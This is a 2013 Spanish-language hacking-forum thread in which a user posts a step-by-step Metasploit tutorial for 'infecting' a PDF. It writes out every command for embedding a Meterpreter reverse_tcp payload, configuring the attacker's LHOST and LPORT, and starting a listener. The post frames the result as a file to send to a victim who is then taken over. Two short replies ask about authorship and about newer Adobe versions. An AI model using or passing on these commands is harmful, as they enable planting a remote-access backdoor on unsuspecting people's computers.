Foro de elhacker.net

Seguridad Informática => Hacking => Mensaje iniciado por: aqqle en 17 Abril 2013, 19:20 pm



Título: Infectar archivo pdf
Publicado por: aqqle en 17 Abril 2013, 19:20 pm
Muy buenas,
Aún y que esto ya está corregido en versiones posteriores a la 9.x todavía es factible su uso...
(http://www.arcpujol.com/AQUI/firma.jpg)
Vamos a crear un pdf infectado utilizando nuestro amigo metasploit...

Crearemos una conexión de la víctima  a nosotros, aumentando en cierta medida el éxito de este ataque, puesto que conexiones externas suelen ser rechazadas por el firewall...

Abriremos una terminal y tecleamos:
Código:
msfconsole  #quizá tengáis que usar sudo msfconsole...
(http://www.arcpujol.com/AQUI/m1.jpg)
Una vez cargado metasploit:
Código:
use exploit/windows/fileformat/adobe_pdf_embedded_exe
Este exploit nos ejecutará el PAYLOAD cuando la víctima abra el PDF... Vamos a darle a metasploit el nombre que tendrá nuestro PDF infectado:
Código:
set FILENAME aqqle.pdf
(http://www.arcpujol.com/AQUI/m2.jpg)
Ahora le indicamos el directorio del fichero PDF original a infectar, en mi caso:
Código:
set INFILENAME /home/bugtraq/Hacking/Manuales/mitm.pdf
Indicamos a metasploit el directorio de salida con:
Código:
set OUTPUTPATH /home/bugtraq/
Vamos a cargar el PAYLOAD a utilizar, en nuestro caso un reverse_tcp:
Código:
set PAYLOAD windows/meterpreter/reverse_tcp
Ok, configuramos ahora nuestra ip (mejor utilizar un NO-ip o similares, ya saben...)
Código:
set LHOST 192.168.0.199
Indicamos el puerto...
Código:
set LPORT 4455
Y configuramos el S.O y versión de Adobe Reader:
Código:
set id 0
(http://www.arcpujol.com/AQUI/m3.jpg)
Ahora toca hacer el exploit...
Código:
exploit
(http://www.arcpujol.com/AQUI/m4.jpg)
Dejaremos el exploit de lado para ponernos a la espera de nuestro PAYLOAD. Para ello:
Código:
back
Nos pondremos a la escucha usando:
Código:
use exploit/multi/handler
Le indicamos el PAYLOAD:
Código:
set PAYLOAD windows/meterpreter/reverse_tcp
Vamos a indicarle nuestra ip así como el puerto a la escucha:
Código:
set LHOST 192.168.0.199
Código:
set LPORT 4455
Indicamos id=0:
Código:
set id 0
(http://www.arcpujol.com/AQUI/m5.jpg)
Finalmente...
Código:
exploit
(http://www.arcpujol.com/AQUI/m6.jpg)

Enviamos nuestro archivo pdf infectado a una víctima, en nuestro caso un Windows XP SP2 y al abrirlo... Se hizo la luz!
(http://www.arcpujol.com/AQUI/m7.jpg)
Una vez aquí... cada uno que haga lo que quiera, lo suyo seria migrar a explorer etc..

Lo siento Sergi...   ;-)

Saludos!

. _ ; _ _ . _ ; _ _ . _ ; . _ . . ; .


Título: Re: Infectar archivo pdf
Publicado por: $Edu$ en 17 Abril 2013, 19:47 pm
Estos tutoriales los has creado tu o son sacados de algun lado? estan buenos, por lo menos directos y sin vueltas ;)

Con las versiones nuevas de Adobe se pude hacer esto igualmente?


Título: Re: Infectar archivo pdf
Publicado por: aqqle en 17 Abril 2013, 20:44 pm
Mio 100%... y mi tiempo me he tirado con el tuto..

Con versiones actuales no funciona, lo pongo mas arriba.. De todas formas todavía es factible su uso.

Saludos